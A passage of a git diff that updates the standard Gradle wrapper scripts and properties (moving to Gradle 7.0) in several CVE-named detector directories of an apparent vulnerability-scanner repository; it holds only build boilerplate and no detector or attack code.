from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat +++ b/community/detectors/apache_druid_preauth_rce_cve_2021_25646/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_http_server_cve_2021_41773/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradlew b/community/detectors/apache_http_server_cve_2021_41773/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_http_server_cve_2021_41773/gradlew +++ b/community/detectors/apache_http_server_cve_2021_41773/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat b/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat +++ b/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradlew b/community/detectors/apache_solr_arbitrary_file_reading/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_solr_arbitrary_file_reading/gradlew +++ b/community/detectors/apache_solr_arbitrary_file_reading/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + 